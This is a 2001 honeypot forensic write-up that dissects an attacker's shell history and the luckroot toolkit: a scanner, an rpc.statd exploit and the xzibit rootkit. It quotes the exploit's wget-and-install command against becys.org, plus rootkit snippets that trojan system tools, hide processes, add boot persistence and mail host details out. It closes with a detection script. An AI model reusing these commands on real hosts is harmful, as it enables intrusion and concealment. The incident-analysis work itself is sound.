From ndesai01@tampabay.rr.com Sat Mar 17 20:03:01 2001
Date: Tue, 13 Mar 2001 12:44:03 -0500
From: Neil Desai
To: project@honeynet.org
Subject: Scan of the Month

1. What is the attacker attempting to do with his command line syntax?

The attacker is scanning a large range of IP addresses. The scans are not performed on regular classful IP boundaries. The two variables that the attacker is passing to the luckgo script are the first and second octets of the IP address range. In effect the attacker is scanning 65,535 hosts with each start of the luckgo script.

Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail
/* The attacker attempted to go to the .mail directory. I am not sure why. */

Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail
/* The attacker attempted to go to the /usr/sbin/.mail directory. I am not sure why. */

Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
/* The attacker uses lynx to download LUCKROOT.TAR from www.becys.org. */

Jan 8 18:48:31 honeypot -bash: HISTORY: PID=1246 UID=0 y
/* The attacker ends the lynx program. */

Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
/* The attacker tries to unzip LUCKROOT.TAR but is unsuccessful. This is the message that the attacker gets:
     tar: z: Cannot open: No such file or directory
     tar: Error is not recoverable: exiting now
   The "z" option needs to be after the "x" option. */

Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu
/* The attacker tries to uncompress "Lu" instead of "LUCKROOT.TAR" and is unsuccessful.
   This is the error the attacker gets:
     tar (child): Lu: Cannot open: No such file or directory
     tar (child): Error is not recoverable: exiting now
     tar: Child returned status 2
     tar: Error exit delayed from previous errors */

Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L
/* The attacker tries to uncompress "L" instead of "LUCKROOT.TAR" and is unsuccessful. This is the error the attacker gets:
     tar (child): L: Cannot open: No such file or directory
     tar (child): Error is not recoverable: exiting now
     tar: Child returned status 2
     tar: Error exit delayed from previous errors
   I think that the attacker forgot to hit the tab key to complete the command. */

Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
/* The attacker successfully extracts the files from "LUCKROOT.TAR". This is the output that the attacker gets:
     luckroot\
     luckroot\luckstatdx.c
     luckroot\luckgo
     luckroot\luckscan-a.c
     luckroot\luckscan-a
     luckroot\luckstatdx
   The directory "luckroot" is created and the files luckstatdx.c, luckgo, luckscan-a.c, luckscan-a and luckstatdx are extracted into it. */

Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot
/* The attacker goes to the luckroot directory. */

Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210
/* The attacker runs the "luckgo" script and is scanning the 216.210.xxx.xxx address range for vulnerable Redhat hosts. */

Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
/* The attacker runs the "luckgo" script and is scanning the 200.120.xxx.xxx address range for vulnerable Redhat hosts. */

Jan 8 18:51:43 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 120
/* The attacker runs the "luckgo" script and is scanning the 64.120.xxx.xxx address range for vulnerable Redhat hosts. */

Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200
/* The attacker forgets to add the "/" after the ".". The script does not run this time.
   This is the message that the attacker gets:
     bash: .luckgo: command not found */

Jan 8 18:52:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 200
/* The attacker makes the change and tries it again, this time scanning the 216.200.xxx.xxx address range for vulnerable Redhat hosts. */

Jan 8 18:54:37 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
/* The attacker runs the "luckgo" script and is scanning the 200.120.xxx.xxx address range for vulnerable Redhat hosts. */

Jan 8 18:55:26 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 63 1
/* The attacker runs the "luckgo" script and is scanning the 63.1.xxx.xxx address range for vulnerable Redhat hosts. */

Jan 8 18:56:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 10
/* The attacker runs the "luckgo" script and is scanning the 216.10.xxx.xxx address range for vulnerable Redhat hosts. */

Jan 8 19:06:04 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 120
/* The attacker runs the "luckgo" script and is scanning the 210.120.xxx.xxx address range for vulnerable Redhat hosts. */

Jan 8 19:07:03 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 1
/* The attacker runs the "luckgo" script and is scanning the 64.1.xxx.xxx address range for vulnerable Redhat hosts. */

Jan 8 19:07:34 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1
/* The attacker runs the "luckgo" script and is scanning the 216.1.xxx.xxx address range for vulnerable Redhat hosts. */

Jan 8 19:09:41 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 194 1
/* The attacker runs the "luckgo" script and is scanning the 194.1.xxx.xxx address range for vulnerable Redhat hosts. */

Jan 8 19:10:53 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1
/* The attacker runs the "luckgo" script and is scanning the 216.1.xxx.xxx address range for vulnerable Redhat hosts. */

Jan 8 19:12:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 128
/* The attacker runs the "luckgo" script and is scanning the 210.128.xxx.xxx address range for vulnerable Redhat hosts. */
Jan 8 19:23:30 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 24 1
/* The attacker runs the "luckgo" script and is scanning the 24.1.xxx.xxx address range for vulnerable Redhat hosts. */

Jan 8 19:35:55 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 12 20
/* The attacker runs the "luckgo" script and is scanning the 12.20.xxx.xxx address range for vulnerable Redhat hosts. */

2. What does the tool accomplish?

This tool kit scans the IP address ranges entered by the attacker and attempts to root RedHat 6.2 hosts that have port 111 open. It attempts to exploit the rpc.statd buffer overflow vulnerability (http://packetstorm.securify.com/advisories/redhat/rhsa.2000-043-01.statd). If the attacker is able to get root access to the host then it will download a rootkit from becys.org and install it. During the installation a message is sent to becys@becys.org informing them of the rooted host. The new rootkit replaces the files /sbin/ifconfig, /bin/netstat, /bin/ps and /usr/bin/top with trojaned versions from the Linux Root Kit v5 by Lord Somer.

3. How does the tool work?

Luckgo

This script gets input from the attacker and passes it to luckscan-a. The input that is given to luckscan-a is the first and second octet of an IP address. The script only checks to see if any data is entered, and does not check the validity of the input.

    if [ "$1" = "" ]; then
      echo " ${cyn}${blink}no${cl}${wht}."
      echo ""
      echo "$rver usage is $0 123 .That is all what u need to do.123 is a class A for h4x0r|ng. "
      exit 0
    fi
    echo " ${cyn}right ${hblk}on${cl}"
    echo ""
    if [ "$1" = "" ]; then
      echo "Enter class A net to scan and h4x0r it for u."
      exit 1

As long as the data is entered the script will then check to see if the files "luckscan" and "luckstatdx" are executable.

    if [ -x luckscan ] && [ -x luckstatdx ];

What I did not understand is why it is checking "luckscan" instead of "luckscan-a". I think that this is an error on their part and the script will always test false on this.
If the files are not both executable, then it will compile "luckscan-a.c" and "luckstatdx.c" to "luckscan" and "luckstatdx" respectively. If "scan.log" exists then the "luckgo" script removes it. Finally it runs "luckscan-a $1 111 $2 $3". The variables are: $1 (first octet in IP address), 111 (port to scan for, SUNRPC), $2 (second octet in IP address), $3 (third octet in IP address).

Luckscan-a

This is a compiled "c" program. It checks to make sure that each variable entered by the attacker is a number greater than 0 but less than 255. It also checks to make sure that the port that is to be scanned is not 0 (zero).

    aa = atoi(argv[1]);
    if ((aa < 0) || (aa > 255)) {
        fatal("Invalid a-range\n");
    }
    port = (unsigned int)atoi(argv[2]);
    if (port == 0)
        fatal("Bad port number.\n");
    if (argc >= 4) {
        bb = atoi(argv[3]);
        if ((bb < 0) || (bb > 255))
            fatal("Invalid b-range.\n");
    }
    if (argc >= 5) {
        cc = atoi(argv[4]);
        if ((cc < 0) || (cc > 255))
            fatal("Invalid c-range.\n");
    }

It will then start scanning the IP address ranges that were entered by the attacker. As it scans it builds a list of hosts that are up and have port 111 open. When it is done it runs "luckstatdx" with the "-d" option set to "0".

    sprintf(luck,"./luckstatdx -d 0 %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)- connlist[i].a));

Luckstatdx

This program actually runs the exploit against the rpc.statd service and attempts to gain root access to the host. It is run with the "-d" option set to "0" and is looking specifically for RedHat 6.2 hosts.

    struct type types[] = {
      {0, "Redhat 6.2 (nfs-utils-0.1.6-2)", shellcode, 0xbffff314, 1024, 600, 9},
      {1, "Redhat 6.1 (knfsd-1.4.7-7)", shellcode, 0xbffff314, 1024, 600, 9},
      {2, "Redhat 6.0 (knfsd-1.2.2-4)", shellcode, 0xbffff314, 1024, 600, 9},
      {0, NULL, NULL, 0, 0, 0, 0}
    };

If this program is able to get root access to the host it will download xzibit.tar.gz, a rootkit, from becys.org.
It will then install the rootkit and remove the original xzibit.tar.gz file.

    send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0);

xzibit.tar.gz

This is the rootkit that gets installed via the "luckstatdx" program. This rootkit consists of the following files: becys.cgi, hdparm, ifconfig, install, linsniffer, logclear, netstat, ps, s, sense, sl2, ssh_host_key, ssh_random_seed, sshdu and top. When the install script is run it will replace /sbin/ifconfig, /bin/netstat, /bin/ps and /usr/bin/top with trojaned versions from the Linux Root Kit v5.

Install (script from xzibit.tar.gz)

The install script starts by replacing the original /sbin/ifconfig, /bin/netstat, /bin/ps and /usr/bin/top with the versions from the Linux Root Kit v5.

    rm -rf /sbin/ifconfig
    mv ifconfig /sbin/ifconfig
    rm -rf /bin/netstat
    mv netstat /bin/netstat
    rm -rf /bin/ps
    mv ps /bin/ps
    rm -rf /usr/bin/top
    mv top /usr/bin/top

The script then makes the file "/dev/dsx". I think that this is a configuration file for the trojaned "ps" and "top" files. In the original Linux Root Kit v5 "README" file it says that a value of 3 will hide all processes with the name "hack" in them. This seems to be altered so that it will not show any of the commands in this configuration file with the following names: sl2, sshdu, linsniffer, smurf, slice, mech, muh, bnc or psybnc.

    touch /dev/dsx >/dev/dsx
    echo "3 sl2" >>/dev/dsx
    echo "3 sshdu" >>/dev/dsx
    echo "3 linsniffer" >>/dev/dsx
    echo "3 smurf" >>/dev/dsx
    echo "3 slice" >>/dev/dsx
    echo "3 mech" >>/dev/dsx
    echo "3 muh" >>/dev/dsx
    echo "3 bnc" >>/dev/dsx
    echo "3 psybnc" >> /dev/dsx

I noticed that all of the names that are entered in this configuration file were not a part of the xzibit.tar.gz rootkit. Either the attacker is a script kiddie that is using someone else's "install" script or they plan to install those programs later.
The second configuration file that it makes is "/dev/caca". This is the configuration file for the trojaned "netstat" utility. When someone runs any form of netstat on this node they will not see any TCP or UDP connections to the 193.231.139.xxx, 213.154.137.xxx and 193.254.34.xxx address spaces. It will not show any connections to the local ports 6969, 3666, 31221 and 22546 or to the remote ports 6969 and 2222.

    touch /dev/caca >/dev/caca
    echo "1 193.231.139" >>/dev/caca
    echo "1 213.154.137" >>/dev/caca
    echo "1 193.254.34" >>/dev/caca
    echo "3 6969" >>/dev/caca
    echo "3 3666" >>/dev/caca
    echo "3 31221" >>/dev/caca
    echo "3 22546" >>/dev/caca
    echo "4 6969" >>/dev/caca
    echo "4 2222" >>/dev/caca

The install script then makes a "home" directory in "/dev/ida/.inet" and moves the rest of the files there.

    echo "Creating home... "
    mkdir -p /dev/ida/.inet
    echo "Copying SSHD and shit..."
    mv -f linsniffer logclear sense sl2 sshdu s ssh_host_key ssh_random_seed sl2new.c /dev/ida/.inet/

There is no "sl2new.c" file in the tar file that I downloaded so I am not sure if it is an error in the script or a file that was forgotten.

The script then makes a file called "tcp.log" in "/dev/ida/.inet". This is where the output from "linsniffer" will be sent.

    touch /dev/ida/.inet/tcp.log

It then appends the line "/usr/bin/hdparm -t1 -X53 -p" to "/etc/rc.d/rc.sysinit".

    echo "/usr/bin/hdparm -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
    echo >> /etc/rc.d/rc.sysinit

It is made to look like the real "hdparm" utility for hard drive performance tuning under Linux. It is added here so that the "hdparm" script will run at startup. Next it moves the file "hdparm" to "/usr/bin" and sets the permissions on it so that only the owner can read and execute it. The script also sets the immutable attribute on the "hdparm" file so that it can't be modified or removed except by the root user, and then executes the "hdparm" script.
    mv hdparm -f /usr/bin/
    chmod 500 /usr/bin/hdparm
    chattr +i /usr/bin/hdparm
    /usr/bin/hdparm

Next it looks for the "cgi-bin" directory and if it finds it then it moves the "becys.cgi" file there.

    if [ -d /home/httpd/cgi-bin ]
    then
    mv -f becys.cgi /home/httpd/cgi-bin/
    fi
    if [ -d /usr/local/httpd/cgi-bin ]
    then
    mv -f becys.cgi /usr/local/httpd/cgi-bin/
    fi
    if [ -d /usr/local/apache/cgi-bin ]
    then
    mv -f becys.cgi /usr/local/apache/cgi-bin/
    fi
    if [ -d /www/httpd/cgi-bin ]
    then
    mv -f becys.cgi /www/httpd/cgi-bin/
    fi
    if [ -d /www/cgi-bin ]
    then
    mv -f becys.cgi /www/cgi-bin/
    fi

After that is complete it makes the file "/tmp/info" and dumps the IP addresses, the FQDN (fully qualified domain name) and all the system information into it. Then it mails this information to becys@becys.org and removes the "/tmp/info" file.

    touch /tmp/info
    /sbin/ifconfig | grep inet >> /tmp/info
    hostname -f >> /tmp/info
    uname -a >> /tmp/info
    cat /tmp/info | mail -s "becys rewting" becys@becys.org
    rm -f /tmp/info

The last thing that is done is it removes the files and directories that it created.

    rm -rf lamerk xzibit.tar.gz

hdparm (script from xzibit.tar.gz)

The script is named to hide the true identity of what it does. When an administrator sees this in the "/etc/rc.d/rc.sysinit" file he/she will not think anything of it, even if they look up the options that were supplied with it. The hdparm script starts the SSH daemon and "linsniffer".

    cd /dev/ida/.inet
    ./sshdu -f ./s
    ./linsniffer >> ./tcp.log &
    cd /

sshdu (ssh daemon from xzibit.tar.gz)

This is the ssh daemon that will allow the attacker back into the system securely. The "-f" option tells it to read a file for its configuration information, in this case "./s".

Logclear (script from xzibit.tar.gz)

The logclear script will kill "linsniffer" and remove the current "tcp.log" file. It will then create a new "tcp.log" file, restart "linsniffer" and redirect its output to "tcp.log".
    killall -9 linsniffer
    rm -rf tcp.log
    touch tcp.log
    ./linsniffer >tcp.log &

sense (PERL script from xzibit.tar.gz)

This PERL script is written by Mike Edulla and is meant to sort the output from "linsniffer ver 0.03".

ssh_random_seed and ssh_host_key (configuration files from xzibit.tar.gz)

The ssh_random_seed and ssh_host_key files are for the SSH daemon that they have installed.

Becys.cgi

Allows the attacker a "web interface" to the compromised host. The attacker can run commands from a web browser.

Sl2 (file from xzibit.tar.gz)

I am not sure what this is. I think that it is a DoS tool, but was unable to find out how it works.

Linsniffer (file from xzibit.tar.gz)

This sniffer is made to find usernames and passwords and log them to a file. It does not get any other information.

Ifconfig, ps, netstat and top (files from xzibit.tar.gz)

All of these utilities are from the Linux Root Kit v5.

4. Is this tool a worm, or would you classify it as something else?

I would not classify this tool as a worm because it lacks the ability to self propagate. I would consider it a tool for a mass rooting of Redhat 6.2 hosts.

5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

As far as I can tell the "luckgo" script is original, as well as the "luckscan-a" program. The "luckstatdx" program is a modification of ron1n's "statdx.c". Becys modified the original "statdx.c" to download "xzibit.tar.gz" when it roots the host. Becys also removed all the information that ron1n gives on the exploit. Some of the tools that were in the xzibit.tar.gz were from the Linux Root Kit v5 and some were most likely written by the attacker.

    // Becys was modify herre some cmd.
    fmax = max(fileno(stdin), sockd) + 1;
    send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install;
    // Aici cred ca trebuie un exit.  (Romanian: "Here I think an exit is needed.")
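The install script walked through under question 3 leaves a fixed set of artifacts on disk: the /dev/dsx and /dev/caca configuration files, the /dev/ida/.inet directory, the hdparm line in rc.sysinit, a shell script where the hdparm binary belongs, and becys.cgi in a cgi-bin directory. The following POSIX shell function is an added example written for this write-up, not code from the submission or from the rootkit; the optional path-prefix argument (for checking a mounted image or a test tree) and the tag names in its output are this example's own conventions.

```shell
#!/bin/sh
# Added defender-side triage check (not part of the original write-up or of
# xzibit.tar.gz): look for the artifacts the rootkit's "install" script leaves.
# The optional $1 is a path prefix so the check can run over a mounted image
# or a test tree instead of the live system. Output is one "TAG path" line per
# finding plus a "TOTAL n" line; exit status is 0 only when nothing was found.
# Tag names and the prefix argument are this example's own conventions.

check_xzibit_artifacts() {
    root="${1:-}"
    found=0

    # Config files written for the trojaned ps/top (/dev/dsx) and netstat (/dev/caca)
    for f in /dev/dsx /dev/caca; do
        if [ -e "$root$f" ]; then
            echo "CONFIG $root$f"
            found=$((found + 1))
        fi
    done

    # Hidden "home" the installer creates for sshdu, linsniffer and tcp.log
    if [ -d "$root/dev/ida/.inet" ]; then
        echo "HOMEDIR $root/dev/ida/.inet"
        found=$((found + 1))
    fi

    # Startup hook appended to rc.sysinit to launch the fake hdparm at boot
    if [ -f "$root/etc/rc.d/rc.sysinit" ] &&
       grep -q 'hdparm -t1 -X53 -p' "$root/etc/rc.d/rc.sysinit"; then
        echo "STARTUP $root/etc/rc.d/rc.sysinit"
        found=$((found + 1))
    fi

    # The real hdparm is a compiled binary; the rootkit's is a shell script,
    # so a "#!" header where an ELF file belongs is a strong indicator
    if [ -f "$root/usr/bin/hdparm" ] &&
       [ "$(head -c 2 "$root/usr/bin/hdparm")" = '#!' ]; then
        echo "FAKEBIN $root/usr/bin/hdparm"
        found=$((found + 1))
    fi

    # becys.cgi dropped into whichever cgi-bin directory the installer found
    for d in /home/httpd/cgi-bin /usr/local/httpd/cgi-bin \
             /usr/local/apache/cgi-bin /www/httpd/cgi-bin /www/cgi-bin; do
        if [ -e "$root$d/becys.cgi" ]; then
            echo "CGI $root$d/becys.cgi"
            found=$((found + 1))
        fi
    done

    echo "TOTAL $found"
    [ "$found" -eq 0 ]
}
```

Run it as `check_xzibit_artifacts` on the live host or `check_xzibit_artifacts /mnt/evidence` against a mounted image; a non-zero exit status with one or more tagged lines means the install script's traces are present.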
Bonus Question: What information can you obtain about who is using or created the tool?

The attackers that did this are BeCyS and ReSpEkt. The domain becys.org (64.176.171.107) resides in Baltimore, Maryland. I looked up the IP address ranges that were in the "netstat" configuration file and this is what I found:

    193.231.139.0 - 193.231.139.255   Allocated to ROEDUNET connected highschools   Romania
    213.154.135.0 - 213.154.140.255   PCNET - ATM-ADSL Network                      Romania
    193.254.34.0 - 193.254.34.15      FININVEST                                     Romania

Gheorghe Popa

Neil Desai